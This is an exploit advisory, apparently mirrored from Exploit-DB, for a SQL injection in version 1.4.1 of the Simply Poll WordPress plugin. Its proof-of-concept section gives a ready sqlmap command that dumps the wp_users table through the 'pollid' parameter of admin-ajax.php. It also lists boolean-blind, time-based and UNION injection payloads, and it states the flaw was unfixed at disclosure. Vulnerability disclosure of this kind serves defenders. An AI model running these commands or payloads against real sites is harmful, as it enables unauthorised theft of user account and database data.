WordPress Plugin Simply Poll 1.4.1 – SQL Injection

  • 作者: TAD GROUP
    日期: 2016-12-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40971/
  • # Exploit Title: Simply Poll 1.4.1 Plugin for WordPress ­ SQL Injection
# Date: 21/12/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits

1 - Description

An unescaped parameter was found in Simply Poll version 1.4.1. ( WP
plugin ). An attacker can exploit this vulnerability to read from the
database.
The POST parameter 'pollid' is vulnerable.


2. Proof of Concept

sqlmap -u "http://example.com/wp-admin/admin-ajax.php"
--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress
--threads=10 --random-agent --dbms=mysql --level=5 --risk=3

Parameter: pollid (POST)
 Type: boolean-based blind
 Title: AND boolean-based blind - WHERE or HAVING clause
 Payload: action=spAjaxResults&pollid=2 AND 6034=6034

 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: action=spAjaxResults&pollid=2 AND SLEEP(5)

 Type: UNION query
 Title: Generic UNION query (NULL) - 7 columns
 Payload: action=spAjaxResults&pollid=-7159 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7171,0x55746570525a68726d4a634844657
9564f524752646c786a5451775272645a6e734b766657534c44,0x7162627171),NULL--
CfNO


3. Attack outcome:

An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access the filesystem may be possible.


4 Impact:

Critical


5. Affected versions:

<= 1.4.1

6. Disclosure Timeline:

21-Dec-2016 ­ found the vulnerability
21-Dec-2016 ­ informed the developer
28-Dec-2016 ­ release date of this security advisory

Not fixed at the date of submitting that exploit.